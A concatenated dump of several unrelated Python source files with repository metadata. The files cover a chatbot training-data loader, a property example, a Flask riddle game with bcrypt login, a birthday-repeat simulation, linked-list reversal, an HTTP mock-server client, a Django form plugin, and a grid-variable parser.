def __init__(self, max_len, file_name = 'utils/data/clr_conversation.txt'):
self.max_len = max_len
self.file_name = file_name
do = "nothing"
def getTrainData(self):
self.get_word_list_final_from_word_list_file()
self.read_npy_train_data()
return self.voc_size,self.train_x,self.train_y,self.word_list_final
def getTestData(self):
word_list = self.get_word_list_final_from_word_list_file()
voc_size = self.get_voc_size(word_list)
return voc_size, word_list
def LoadData(self, file_name = 'utils/data/clr_conversation.txt'):
# data, label
train_data = []
train_label = []
whole_data = []
# load file id
with open(file_name, 'r', encoding = 'utf8',errors='ignore') as f:
#f.encoding = 'utf8'
train_sentences = f.read().split('\n')
for i in range(len(train_sentences)-1):
#print(train_sentences[i])
if train_sentences[i] != '+++$+++' and train_sentences[i+1] != '+++$+++':
train_data.append(train_sentences[i].split())
train_label.append(train_sentences[i+1].split())
whole_data = [] + train_data#[] is to not to let the train_data address point to whole_data address
whole_data.append(train_label[-1])
self.train_data = train_data
self.train_label = train_label
self.whole_data = whole_data
def get_word_list_final_from_word_list_file(self):
with open('utils/data/dictionary.txt', 'rb') as f:
self.word_list_final = pickle.load(f)
return self.word_list_final
def get_voc_size(self, word_list):
self.voc_size = len(word_list)
return self.voc_size
def add_words(self):
for i in range(len(self.whole_data)):
if (i%10000) == 0:
print(i,'/',len(self.whole_data),'it is add_words function!')
for ii in range(len(self.whole_data[i])):
if(self.whole_data[i][ii] not in self.word_list):
self.word_list.append(self.whole_data[i][ii])
self.times.append(1)
else:
index = self.word_list.index(self.whole_data[i][ii])
self.times[index] += 1
if self.times[index] == 50:
self.word_list_final.append(self.whole_data[i][ii])
#print(len(self.word_list))
self.voc_size = len(self.word_list_final)
self.store_word_list()
def BuildTrainableData(self):
self.get_word_list_final_from_word_list_file()
max_len = self.max_len
data_len = len(self.train_data)# about 2.7 millions...
print('data_len',data_len)
train_x = np.zeros((data_len,max_len))
train_y = np.zeros((data_len,max_len))
for i in range(data_len):#build data
if (i%10000) == 0:
print(i,'/',data_len,'it is BuildTrainableData!')
for ii in range(max_len):
if ii < len(self.train_data[i]):#not padding
if self.train_data[i][ii] in self.word_list_final:
index = self.word_list_final.index(self.train_data[i][ii])
train_x[i][ii] = index
else:
train_x[i][ii] = 3
elif ii == len(self.train_data[i]):
train_x[i][ii] = 2
else:#padding
train_x[i][ii] = 0
for i in range(data_len):#build label
if (i%10000) == 0:
print(i,'/',data_len,'it is BuildTrainableData!')
for ii in range(max_len):
if ii < len(self.train_label[i]):#not padding
if self.train_label[i][ii] in self.word_list_final:
index = self.word_list_final.index(self.train_label[i][ii])
train_y[i][ii] = index
else:
train_y[i][ii] = 3
elif ii == len(self.train_label[i]):
train_y[i][ii] = 2
else:#padding
train_y[i][ii] = 0
self.train_x = train_x
self.train_y = train_y
self.store_train_data()
def get_data_word(self,index):
data_word = []
for i in range(self.voc_size):
if i == index:
data_word.append(1)
else:
data_word.append(0)
return data_word
def read_train_data(self):
        self.get_voc_size(self.word_list_final)
with open('utils/data/train_data_x.txt', 'rb') as f:
self.train_x = pickle.load(f)
with open('utils/data/train_data_y.txt', 'rb') as f:
self.train_y = pickle.load(f)
def read_npy_train_data(self):
self.voc_size = 3004
self.train_x = np.load('utils/data/train_data.npy')
self.train_y = np.load('utils/data/train_label.npy')
self.train_y = self.train_y[:,1:]
def store_train_data(self):
with open('utils/data/train_data_x(25).txt', 'wb') as f_x:
pickle.dump(self.train_x,f_x)
with open('utils/data/train_data_y(25).txt', 'wb') as f_y:
pickle.dump(self.train_y,f_y)
def store_word_list(self):
with open('utils/data/word_list.txt', 'wb') as f:
            pickle.dump(self.word_list_final,f)
| UTF-8 | Python | false | false | 6,044 | py | 7 | dataManager.py | 2 | 0.519689 | 0.510258 | 0 | 152 | 38.769737 | 107 |
vikash-india/DeveloperNotes2Myself | 15,710,990,377,196 | 2a242383ab2f24fb9706a8119ac93b368ac81e5c | 992d7341b692b7e659510b261fd4ab168f4a1c13 | /languages/python/src/concepts/P085_OOP_GettersAndSetters.py | 27ae141de0fdbea8cdebe5832fb5387a9ee3afd6 | ["MIT"]
| permissive | https://github.com/vikash-india/DeveloperNotes2Myself | 427cd8ef98ab73ce42c4c4a74ca6f1395f508ae4 | fe277a3c52f73884863f2f72b237365b27a8c882 | refs/heads/develop | 2022-09-04T22:03:34.592580 | 2020-10-30T08:05:00 | 2020-10-30T08:05:00 | 146,297,297 | 2 | 6 | MIT | false | 2022-08-23T17:42:55 | 2018-08-27T12:54:19 | 2022-03-11T09:06:23 | 2022-08-23T17:42:52 | 46,228 | 1 | 3 | 8 | XSLT | false | false |
# Description: Getters and Setters
"""
### Note
* None
"""
class Player(object):
def __init__(self, name):
self.name = name
self._lives = 3
self.level = 1
self.score = 0
def _get_lives(self):
return self._lives
def _set_lives(self, lives):
if lives >= 0:
self._lives = lives
else:
print("Lives cannot be negative")
self._lives = 0
lives = property(_get_lives, _set_lives)
def __str__(self):
return "Name: {0.name}, Lives: {0.lives}, Level: {0.level}, Score {0.score}".format(self)
if __name__ == '__main__':
dilbert = Player("Dilbert")
print(dilbert.name)
print(dilbert.lives)
dilbert.lives -= 1
print(dilbert)
dilbert.lives -= 1
print(dilbert)
dilbert.lives -= 1
print(dilbert)
dilbert.lives -= 1
print(dilbert)
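    # Equivalent modern idiom (illustrative sketch, not part of the original
    # exercise): the @property decorator pair below mirrors the explicit
    # _get_lives/_set_lives + property() wiring used in Player above.
    #
    #     @property
    #     def lives(self):
    #         return self._lives
    #
    #     @lives.setter
    #     def lives(self, lives):
    #         self._lives = max(lives, 0)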
| UTF-8 | Python | false | false | 891 | py | 823 | P085_OOP_GettersAndSetters.py | 302 | 0.540965 | 0.526375 | 0 | 48 | 17.5625 | 97 |
Eliory09/Riddlism | 10,058,813,425,973 | 8c9475b82d2b4f39845afa7de9e4f5cb5c9fb548 | ce32aa910d7fe6c143bfb3b3dc72fc67bf7e3d3f | /app.py | bfcf16bcb2264b0060f5bfb2d7c2840ff61aa40d | []
| no_license | https://github.com/Eliory09/Riddlism | 2eae278b3642d16091174fbcf746e8777ed55bda | 70e282c2a8f1253672611a9d2c8203917424aee0 | refs/heads/main | 2023-08-23T16:52:06.180703 | 2023-08-11T11:01:04 | 2023-08-11T11:01:04 | 319,796,544 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
import bcrypt
from dotenv import load_dotenv
from flask import (Flask, abort, flash, g, redirect, render_template, request,
session, url_for)
from flask_login import (LoginManager, current_user, login_required,
login_user, logout_user)
from peewee import fn
from playhouse.shortcuts import model_to_dict
import config
from models import Difficulty, Riddles, Users, UsersRiddles, database, db_proxy
# Initialization
load_dotenv()
SECRET_KEY = os.getenv('SECRET_KEY')
if 'HEROKU' in os.environ:
    SECRET_KEY = SECRET_KEY.encode('utf-8')
app = Flask(__name__)
app.secret_key = SECRET_KEY
app.config.from_object(config.DevelopmentConfig())
login_manager = LoginManager()
login_manager.init_app(app)
MINIMAL_PASS_LENGTH = 8
RIDDLES_LIMIT = 150
TOP_PLAYERS = 10
@login_manager.user_loader
def load_user(user_id):
"""User loader function."""
try:
user = Users.get(user_id)
    except Exception:
return
return user
@app.before_request
def _db_connect():
g.db = db_proxy
g.db.connect()
@app.teardown_request
def _db_close(_):
if not database.is_closed():
g.db.close()
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.j2'), 404
@app.errorhandler(401)
def page_unauthorized(e):
return render_template('401.j2'), 401
# Register error handlers.
app.register_error_handler(404, page_not_found)
app.register_error_handler(401, page_unauthorized)
#App routes.
@app.route('/index')
@app.route('/')
def index():
return render_template("index.j2")
@app.route('/register', methods=["GET", "POST"])
def register():
if request.method == "POST":
user = Users.select(Users.username).where(fn.Lower(Users.username) == request.form['username'].lower())
if user:
flash('Username is already registered', "registered")
elif len(request.form['password']) < MINIMAL_PASS_LENGTH:
            flash('Password must be at least 8 characters long')
else:
salt = bcrypt.gensalt(prefix=b'2b', rounds=10)
unhashed_password = request.form['password'].encode('utf-8')
hashed_password = bcrypt.hashpw(unhashed_password, salt)
fields = {
**request.form,
'password': hashed_password
}
user = Users(**fields)
user.save()
login_user(user)
return redirect(url_for('index'))
return render_template("register.j2")
@app.route('/riddles/<int:riddle_id>', methods=["GET", "POST"])
@login_required
def riddle(riddle_id):
if riddle_id >= RIDDLES_LIMIT:
abort(404)
query = UsersRiddles.select(UsersRiddles.riddle_id).where(UsersRiddles.user_id == current_user.user_id)
solved = {riddle.riddle_id for riddle in query}
for num in solved:
if num == riddle_id:
return redirect(url_for('correct', riddle_id=riddle_id))
if request.method == "POST":
riddle = Riddles.select().where(Riddles.riddle_id == riddle_id).get()
answer = riddle.answer.lower()
if answer != request.form['user_answer'].lower():
flash("Wrong answer. Try again.")
else:
UsersRiddles.create(riddle=riddle_id, user=current_user.user_id)
current_user.points += 1
current_user.save()
return redirect(url_for('correct', riddle_id=riddle_id))
riddle = Riddles.select().where(Riddles.riddle_id == riddle_id).join(Difficulty, attr='difficulty_id').get()
riddle_dict = model_to_dict(riddle)
return render_template("riddle.j2", **riddle_dict)
@app.route('/riddles/<int:riddle_id>/correct', methods=["GET", "POST"])
@login_required
def correct(riddle_id):
return render_template("correct.j2", riddle_id=riddle_id, username=current_user.name)
@app.route('/riddles')
@login_required
def riddles():
query = (Riddles
.select(Riddles.riddle_id)
.order_by(Riddles.riddle_id)
.limit(RIDDLES_LIMIT))
riddles = [riddle.riddle_id for riddle in query]
query = UsersRiddles.select(UsersRiddles.riddle_id).where(UsersRiddles.user_id == current_user.user_id)
solved = {riddle.riddle_id for riddle in query}
return render_template("riddles.j2", riddles=riddles, solved=solved)
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST' and request.form['username']:
try:
input_username = request.form['username'].lower()
user = Users.select().where(
fn.Lower(Users.username) == input_username
).get()
except Users.DoesNotExist:
flash('No such username found. Please try again')
else:
fields = model_to_dict(user)
pw = request.form['password'].encode('utf-8')
if bcrypt.checkpw(pw, fields['password'].encode('utf-8')):
user = Users(**fields)
login_user(user)
return redirect(url_for('index'))
else:
flash('The password entered is incorrect')
return render_template('login.j2')
@app.route('/ranking')
def ranking():
top_players = (Users
.select()
.order_by(Users.points.desc())
.limit(TOP_PLAYERS))
top_players = [(i, user) for i, user in enumerate(top_players, 1)]
print(top_players)
return render_template('ranking.j2', top_players=top_players)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run(threaded=True, port=5000)
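    # When run directly, the site is served on http://localhost:5000 (see
    # app.run above); SECRET_KEY is read from the environment or a .env file.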
| UTF-8 | Python | false | false | 5,667 | py | 16 | app.py | 2 | 0.625551 | 0.61567 | 0 | 186 | 29.467742 | 112 |
Cyren4/bootcamp-python | 6,459,630,818,239 | f5b1959f98f16f318d9d6adf0666539a5657d2bb | cdafd6218ff5a2f936f8507e9f289e42322309e6 | /42/boootcamp/day00/ex05/kata02.py | 06011d0d9638203809fba2bcbc258a14edc17ddc | []
| no_license | https://github.com/Cyren4/bootcamp-python | 33fee15bf67b7206315be8ad151090fd741b32ca | 7e6f3986535f7e6f47be8aa6266b39788dd18de0 | refs/heads/master | 2022-04-16T12:14:06.036133 | 2020-04-16T14:31:12 | 2020-04-16T14:31:12 | 256,238,226 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
hour, minutes, year, month, day = (3,30,2019,9,25)
print("%.2d/%.2d/%d %.2d:%d" %(day, month, year, hour, minutes))
| UTF-8 | Python | false | false | 119 | py | 18 | kata02.py | 16 | 0.579832 | 0.470588 | 0 | 3 | 38 | 64 |
ezucca/reoccuring-bday-prob-python | 4,355,096,862,709 | 5be6a6d7af7c6e9f658b62601a6ec61172edf464 | c743889d698a4be9607a83c2194e967587ee195f | /a4code.py | b028fc59be2ffde733556b149e58ced18c6126ca | []
| no_license | https://github.com/ezucca/reoccuring-bday-prob-python | 4773861cee4ab8efb730e2378839d1cbd7fcf94d | 3068ff323eac17f83d2137f15ebb56735a72a9cf | refs/heads/master | 2016-08-05T03:54:12.259470 | 2015-06-30T05:57:46 | 2015-06-30T05:57:46 | 38,290,575 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Emily Zucca
from pylab import *
import numpy.random as npr
from math import *
import random as rand
def combinations(n, k):
prod = 1.0
for j in range(k):
prod = prod * (n-j) / (j+1)
return prod
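# Illustrative analytic cross-check (added sketch, not used by the plots
# below): under the uniform model, P(at least one shared birthday among k
# people) = 1 - 365!/((365-k)! * 365^k); e.g. k = 23 gives ~0.507.
def analytic_repeat_prob(k, days=365):
    return 1.0 - combinations(days, k) * factorial(k) / float(days) ** k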
#Real Birthdays
infile = open('birthday.txt', 'r')
bdays = []
for i in range(365):
s = infile.readline().split()
bdays.append(int(s[1]))
def plotA():
title("Birthdays (1978)")
xlabel("Bdays")
ylabel("Frequency")
ylim(0, 11000)
domain1 = array(range(1, 366)) - 0.1
vals = bdays
stem(domain1, vals, markerfmt = 'b.', label = "freq of bdays")
legend(loc = 'upper left')
show()
def valuesB():
    # Sample one day-of-year (0-364) weighted by the empirical 1978 birthday
    # counts (each count divided by 3,333,239 to form probabilities).
infile = open('birthday.txt', 'r')
bdaylist = []
result = []
d = range(0, 365)
for j in range(365):
s = infile.readline().split()
bdaylist.append(int(s[1]))
for i in range(365):
n = bdaylist[i]/3333239.0
result.append(n)
r = npr.choice(d, p=result)
return r
def plotB():
    # Monte Carlo experiment: for both the empirical (1978) and the uniform
    # birthday models, estimate how many people must be sampled before a
    # birthday repeats, then plot both cumulative distributions.
d = range(0, 365)
bdaylist = []
result = [0] * 100
bdaylist2 = []
result2 = [0] * 100
for i in range(10000):
r = 0
bdaylist[:] = []
while (r < 100):
r = r + 1
b = valuesB()
if b in bdaylist:
result[r] = result[r] + 1
break
else:
bdaylist.append(b)
for j in range(10000):
r2 = 0
bdaylist2[:] = []
while (r2 < 100):
r2 = r2 + 1
b2 = plotC()
if b2 in bdaylist2:
result2[r2] = result2[r2] + 1
break
else:
bdaylist2.append(b2)
xlabel("Num of Ppl")
ylabel("Probabilities")
title("Prob of Re-Occurring Bdays")
cumulative = cumsum(result)
rlist = array(cumulative)/10000.0
ppl = range(1, 101)
plot(ppl, rlist, label = "cumulative distribution")
cumulative2 = cumsum(result2)
rlist2 = array(cumulative2)/10000.0
ppl2 = range(1,101)
plot(ppl2, rlist2, label = "uniform distribution")
show()
def plotC():
    # Sample one day-of-year (0-364) uniformly at random.
rlist = [1/365.0] * 365
d = range(0, 365)
b = npr.choice(d, p=rlist)
return b
| UTF-8 | Python | false | false | 2,283 | py | 1 | a4code.py | 1 | 0.502409 | 0.444152 | 0 | 114 | 18.605263 | 66 |
leohsmedeiros/DataScienceStudy | 1,520,418,462,724 | 32613b2e3b23cb47f8032ecd37dc0bbfbed81100 | 497bd5b174c2ea1798ea077a23e8d64a6efcdbf5 | /udemy/05 - grafos/04 - Caminhos e Distâncias/caminhos_distancias_parte_01.py | badb8908bf00b7f7dfd63ae90ddbcf7ebaf49147 | []
| no_license | https://github.com/leohsmedeiros/DataScienceStudy | 804d5a857516d5c8a64e0314c0d4886e4632fac8 | 69b9b61dbde8437d771a1dfda1ea5d3af23e78fb | refs/heads/master | 2020-04-11T10:09:17.828999 | 2019-09-13T16:26:01 | 2019-09-13T16:26:01 | 161,705,084 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from igraph import Graph
from igraph import plot
"""
We will work with the computation of paths and distances
"""
grafo = Graph(edges = [(0,2), (0,1), (1,4), (1,5), (2,3), (6,7), (3,7), (4,7), (5,6)], directed = True)
grafo.vs['label'] = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
# one weight per edge; the final value is an assumed filler so that the
# list matches the 9 edges declared above
grafo.es['weight'] = [2,1,2,1,2,1,3,1,1]
# edge_label draws each edge's weight on the plot
plot(grafo, bbox = (300,300), edge_label = grafo.es['weight'])
# let's compute the shortest route from A -> H
# vpath returns the paths as sequences of vertices
caminho_vertice = grafo.get_shortest_paths(0, 7, weights = 'weight', output = 'vpath')
# the result is a list of paths with a single entry, hence the [0] below
for n in caminho_vertice[0]:
print(grafo.vs[n]['label'])
# epath returns the paths as sequences of edges
# it returns the index of each traversed edge; summing the weights at those indices gives the shortest distance (cost)
caminho_aresta = grafo.get_shortest_paths(0, 7, weights = 'weight', output = 'epath')
# caminho_aresta comes back as a nested list, so convert it manually into a flat list
caminho_aresta_id = []
for n in caminho_aresta[0]:
caminho_aresta_id.append(n)
distancia = 0
for e in grafo.es:
    # if this edge's index is in caminho_aresta_id
if e.index in caminho_aresta_id:
distancia += grafo.es[e.index]['weight']
| UTF-8 | Python | false | false | 1,351 | py | 48 | caminhos_distancias_parte_01.py | 47 | 0.671386 | 0.640835 | 0 | 39 | 33.410256 | 119 |
yannabraham/PickANumber | 5,961,414,651,587 | 9d6317cedf9ad570d1e4ed59781a2439a13ec9ee | 1ff8ed674aff56d11818aa7d5138140b0c645091 | /src/PickANumber.py | da1eac7afbe51e42ade229e8671ed608baf97891 | []
| no_license | https://github.com/yannabraham/PickANumber | e1e56b5993842b306ac0060bbb881baabceef693 | 453f8d28487d8a9f6359a82125d8d80a16547b89 | refs/heads/master | 2016-09-05T19:23:16.093224 | 2015-08-24T12:22:00 | 2015-08-24T12:22:00 | 41,301,459 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
Created on Feb 14, 2014
@author: abrahya1
'''
from random import randint
def pickANumber(turns=3,minNum=1,maxNum=10):
score = [0,0]
while turns>0:
secretNumber = randint(minNum, maxNum)
        print 'Pick a number between %i and %i\t' % (minNum, maxNum)
myGuess = None
while myGuess is None:
myGuess = raw_input('??')
            if int(myGuess) < minNum or int(myGuess) > maxNum:
myGuess = None
if int(myGuess)==secretNumber:
            print 'You win :-)'
score[0]+=1
else:
            print 'You lose :-('
score[1]+=1
turns-=1
    print 'Final score after %i rounds\n' % sum(score)
    print 'Me: %i\nYou: %i' % (score[1], score[0])
return(None)
if __name__ == '__main__':
    pickANumber(5,1,10)
| UTF-8 | Python | false | false | 821 | py | 2 | PickANumber.py | 2 | 0.53106 | 0.500609 | 0 | 31 | 25.516129 | 70 |
pretenders/pretenders | 14,800,457,309,344 | 52ae35062991edc9ac0829a6d4260477dc1fe7c6 | c4a6a4d2c27ce50b568ef216f3064a5a6dba99ee | /pretenders/client/__init__.py | 5f577ca924c2ea1798ea077a23e8d64a6efcdbf5 | ["MIT"]
| permissive | https://github.com/pretenders/pretenders | 1a9aba9aca61e2c6601ff3ce17cff2fbd397002f | d76f5ce3504c64bc1c583f912c8ef1f7ebbe1ee2 | refs/heads/develop | 2022-08-03T10:19:25.980148 | 2022-07-10T22:02:58 | 2022-07-10T22:02:58 | 4,322,486 | 87 | 30 | MIT | false | 2022-07-10T22:02:59 | 2012-05-14T10:19:45 | 2022-06-24T09:47:32 | 2022-07-10T22:02:58 | 1,064 | 108 | 22 | 30 | Python | false | false |
import json
import logging
try:
from http import client as httplib
except ImportError:
# Python 2.6/2.7
import httplib
import urllib
from pretenders.common.exceptions import (
ConfigurationError,
ResourceNotFound,
UnexpectedResponseStatus,
)
from pretenders.common.pretender import PretenderModel
from pretenders.common.http import binary_to_ascii, Preset
LOGGER = logging.getLogger("pretenders.client")
class APIHelper(object):
def __init__(self, connection, path):
self.connection = connection
self.path = path
def _get_response(self, method, *args, **kwargs):
self.connection.request(method=method, *args, **kwargs)
return self.connection.getresponse()
def http(self, method, *args, **kwargs):
"""
Issue an HTTP request.
The HTTP connection is reused between requests. We try to detect
dropped connections, and in those cases try to reconnect to the remote
server.
"""
try:
response = self._get_response(method, *args, **kwargs)
except (httplib.CannotSendRequest, httplib.BadStatusLine):
self.connection.close()
self.connection.connect()
response = self._get_response(method, *args, **kwargs)
return response, response.read()
def get(self, id):
return self.http("GET", url="{0}/{1}".format(self.path, id))
def list(self, filters={}):
query_string = ""
if filters:
query_string = "?{0}".format(urllib.urlencode(filters))
url = "{0}{1}".format(self.path, query_string)
return self.http("GET", url=url)
def reset(self):
return self.http("DELETE", url=self.path)
class PresetHelper(APIHelper):
def add(
self,
match_rule=None,
response_status=200,
response_body=b"",
response_headers={},
times=1,
after=0,
):
"""
Add a new preset to the boss server.
"""
new_preset = Preset(
headers=response_headers,
body=binary_to_ascii(response_body),
status=response_status,
rule=match_rule,
times=times,
after=after,
)
response, data = self.http("POST", url=self.path, body=new_preset.as_json())
if response.status != 200:
raise ConfigurationError(data.decode())
return response
class BossClient(object):
boss_mock_type = None
def __init__(self, host, port, timeout=None, name=None):
self.host = host
self.port = port
self.timeout = timeout
self.name = name
self.full_host = "{0}:{1}".format(self.host, self.port)
self.connection = httplib.HTTPConnection(self.full_host)
self.boss_access = APIHelper(self.connection, "")
LOGGER.info(
"Requesting {0} pretender. Port:{1} Timeout:{2} ({3})".format(
self.boss_mock_type, self.port, self.timeout, self.name
)
)
if self.boss_mock_type:
self.pretender_details = self._request_mock_access()
else:
self.pretender_details = {}
self.history = APIHelper(
self.connection, "/history/{0}".format(self.pretend_access_point_id)
)
self.preset = PresetHelper(
self.connection, "/preset/{0}".format(self.pretend_access_point_id)
)
def reset(self):
"""
Delete all history.
"""
self.history.reset()
self.preset.reset()
return self
@property
def create_mock_url(self):
return "/{0}".format(self.boss_mock_type)
@property
def pretend_access_point_id(self):
return self.pretender_details.get("id", "")
@property
def pretend_access_point(self):
return self.full_host
def _request_mock_access(self):
"""
Ask the boss to create a mock server by POSTing to ``create_mock_url``
:returns:
A tuple containing:
position 0: hostname[:port] of the mock server
position 1: unique id of the pretender (for teardown
purposes)
"""
post_body = {"name": self.name}
if self.timeout:
post_body["pretender_timeout"] = self.timeout
post_body = json.dumps(post_body)
response, data = self.boss_access.http(
"POST", url=self.create_mock_url, body=post_body
)
pretender_json = data.decode("ascii")
pretender_details = json.loads(pretender_json)
return pretender_details
@property
def delete_mock_url(self):
return "{0}/{1}".format(self.create_mock_url, self.pretend_access_point_id)
def delete_mock(self):
"Delete the mock server that this points to."
response, data = self.boss_access.http(
method="DELETE", url=self.delete_mock_url
)
if not response.status == 200:
raise Exception("Delete failed")
def get_pretender(self):
"Get pretenders from the server in dict format"
response, data = self.boss_access.http(
method="GET",
url="/{0}/{1}".format(self.boss_mock_type, self.pretend_access_point_id),
)
if response.status == 200:
return PretenderModel.from_json_response(data)
elif response.status == 404:
raise ResourceNotFound("The mock server for this client was shutdown.")
else:
raise UnexpectedResponseStatus(response.status)
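# Illustrative usage sketch (assumptions, not part of this module): in
# practice a subclass that sets ``boss_mock_type`` is instantiated; the
# host, port and preset values below are examples only.
#
#     client = SomeMockClient('localhost', 8000)   # hypothetical subclass
#     client.preset.add(response_status=200, response_body=b'hi')
#     response, body = client.history.get(0)       # first captured request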
| UTF-8 | Python | false | false | 5,630 | py | 66 | __init__.py | 48 | 0.587034 | 0.579751 | 0 | 190 | 28.631579 | 85 |
mansonul/events | 6,906,307,414,289 | 6951d356195e9916d0b2a60c12e0c4299669b83d | a03eba726a432d8ef133f2dc55894ba85cdc4a08 | /events/contrib/plugins/form_elements/content/content_image_url/base.py | 0ff2a1ce5632a97fada8892c315fffaf50b87da0 | ["MIT"]
| permissive | https://github.com/mansonul/events | 2546c9cfe076eb59fbfdb7b4ec8bcd708817d59b | 4f6ca37bc600dcba3f74400d299826882d53b7d2 | refs/heads/master | 2021-01-15T08:53:22.442929 | 2018-01-30T16:14:20 | 2018-01-30T16:14:20 | 99,572,230 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from __future__ import absolute_import
from collections import OrderedDict
from uuid import uuid4
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from nonefield.fields import NoneField
from fobi.base import FormElementPlugin
from . import UID
from .forms import ContentImageURLForm
from .settings import (
FIT_METHOD_FIT_WIDTH,
FIT_METHOD_FIT_HEIGHT,
)
__title__ = 'fobi.contrib.plugins.form_elements.content.content_image_url.base'
__author__ = 'Artur Barseghyan <artur.barseghyan@gmail.com>'
__copyright__ = '2014-2017 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
__all__ = ('ContentImageURLPlugin',)
class ContentImageURLPlugin(FormElementPlugin):
"""Content image plugin."""
uid = UID
name = _("Content image URL")
group = _("Content")
form = ContentImageURLForm
def post_processor(self):
"""Post process data.
Always the same.
"""
self.data.name = "{0}_{1}".format(self.uid, uuid4())
def get_raw_data(self):
"""Get raw data.
Might be used in integration plugins.
"""
return OrderedDict(
(
('url', self.data.url),
('alt', self.data.alt),
('fit_method', self.data.fit_method),
('size', self.data.size),
)
)
def get_rendered_image(self):
"""Get rendered image."""
width, height = self.data.size.split('x')
if FIT_METHOD_FIT_WIDTH == self.data.fit_method:
thumb_size = (width, 0)
elif FIT_METHOD_FIT_HEIGHT == self.data.fit_method:
thumb_size = (0, height)
else:
thumb_size = (width, height)
context = {
'plugin': self,
'thumb_size': thumb_size,
}
rendered_image = render_to_string(
'content_image_url/render.html',
context
)
return rendered_image
def get_form_field_instances(self, request=None, form_entry=None,
form_element_entries=None, **kwargs):
"""Get form field instances."""
field_kwargs = {
'initial': self.get_rendered_image(),
'required': False,
'label': '',
}
return [(self.data.name, NoneField, field_kwargs)]
| UTF-8 | Python | false | false | 2,378 | py | 144 | base.py | 109 | 0.576535 | 0.568966 | 0 | 86 | 26.651163 | 79 |
dipeshjoshi/MachineLearning | 4,664,334,484,263 | 85bbd8a0ab0f94b42f4ef73f16581bd2ae1e62a3 | c71248c1e83714a457daf0490c8db42b6697717f | /python/algoInPython/linkedList/reversingLinkedList.py | 8a666bbe7f086558133823f4616dbbd6aaa77846 | []
| no_license | https://github.com/dipeshjoshi/MachineLearning | c3841f928e45fe142f1bfc6bfe29c8a8f5118d60 | 2231bb7dea4f416558f0a862430d6f15f12deaf9 | refs/heads/master | 2021-05-06T10:42:55.029053 | 2019-03-15T09:35:03 | 2019-03-15T09:35:03 | 114,160,960 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import singly_linked_list as sll
class ReverseLinkedList:
def reverseIterative(self, linkedList):
if linkedList.head is not None:
            ptr1 = linkedList.head
            ptr2 = ptr1.next
while ptr2 is not None:
if(ptr1 == linkedList.head):
ptr1.next = None
temp = ptr2.next
ptr2.next = ptr1
ptr1 = ptr2
ptr2 = temp
linkedList.head = ptr1
    def recursiveReverse(self, node, prev=None):
        # Recursively point each node back at its predecessor; when the end
        # of the list is reached, `prev` is the new head, which is returned.
        if node is None:
            return prev
        nextNode = node.next
        node.next = prev
        return self.recursiveReverse(nextNode, node)
if __name__=='__main__':
inputList = [9,2,3,4]
lList = sll.SinglyLinkedList()
for item in inputList:
lList.addElement(item)
lList.printLinkedList()
rev = ReverseLinkedList()
#rev.reverseIterative(lList)
#lList.printLinkedList()
    lList.head = rev.recursiveReverse(lList.head)
    lList.printLinkedList()
| UTF-8 | Python | false | false | 822 | py | 92 | reversingLinkedList.py | 84 | 0.553528 | 0.532847 | 0 | 40 | 19.55 | 44 |
tahandy/numerical | 12,627,203,880,509 | db217ebcca3b941b0f39ba8bcc914df3cd55ca83 | e568b63b013ff810eb279362e3ceab70169ff3ed | /grid/uniform/python/gridUniform.py | a6cd997f8239f29ca85f76585b35a3f9e4dc863a | ["MIT"]
| permissive | https://github.com/tahandy/numerical | 23a4e14b9186819d22b9f9d39b81c37593e886e7 | e8790f05ee323c7a8104e3becc8fd1a4d25023eb | refs/heads/master | 2021-01-10T19:03:17.022310 | 2015-10-30T04:16:55 | 2015-10-30T04:16:55 | 40,026,745 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2015 Timothy A. Handy
This module is intended to serve as a simple uniform numerical
grid implementation in Python 2.7.10. It is intended to support
cell, face, and edge centered variables in up to 3 dimensions.
Data is managed via the numpy library (www.numpy.org).
'''
from gridUniformConstants import *
import numpy as np
import collections
class gridUniform:
NDIM = -1
NUNKVAR = 0
NFACEVAR = 0
NEDGEVAR = 0
unkMap = dict()
faceMap = dict()
edgeMap = dict()
extents = np.zeros([MDIM,HIGH])
def parseVariables(self,confFile):
varIdentifier = 'VARIABLE'
varSuffix = '_VAR'
[self.NUNKVAR, self.unkMap] = parseVariableType(confFile, varIdentifier, varSuffix)
varIdentifier = 'FACEVAR'
varSuffix = '_FACE'
[self.NFACEVAR, self.faceMap] = parseVariableType(confFile, varIdentifier, varSuffix)
varIdentifier = 'EDGEVAR'
varSuffix = '_EDGE'
[self.NEDGEVAR, self.edgeMap] = parseVariableType(confFile, varIdentifier, varSuffix)
print self.NUNKVAR
print self.unkMap
print self.NFACEVAR
print self.faceMap
print self.NEDGEVAR
print self.edgeMap
def __init__(self):
print "Hello world!"
self.parseVariables('variable_config.par')
print self.extents
def parseVariableType(confFile, ident, suff):
SZ = 0
varList = []
for line in open(confFile):
lineNew = line.upper()
if ident in lineNew:
tmp = lineNew.split(None)
varList = varList + [tmp[1].replace(' ','')]
    # dedupe first, then sort, so the index assignment below is deterministic
    # (sorting before converting to a set discarded the ordering)
    varList = sorted(set(varList))
# Construct the {var}_{suff} map to integer indices
varMap = dict()
for v in varList:
SZ += 1
varMap['%s%s'%(v[:4].replace(' ',''),suff)] = SZ-1
# Add the {var}_{suff} variable as a global constant
for v in varMap:
globals()[v] = varMap[v]
return [SZ,varMap]
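# Illustrative only -- a minimal 'variable_config.par' this parser would accept
# (the variable names are made up, not from the original repo):
#   VARIABLE dens
#   VARIABLE pres
#   FACEVAR  flux
#   EDGEVAR  emf
# which yields DENS_VAR = 0, PRES_VAR = 1, FLUX_FACE = 0 and EMF_EDGE = 0
# as module-level constants.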
if __name__ == "__main__":
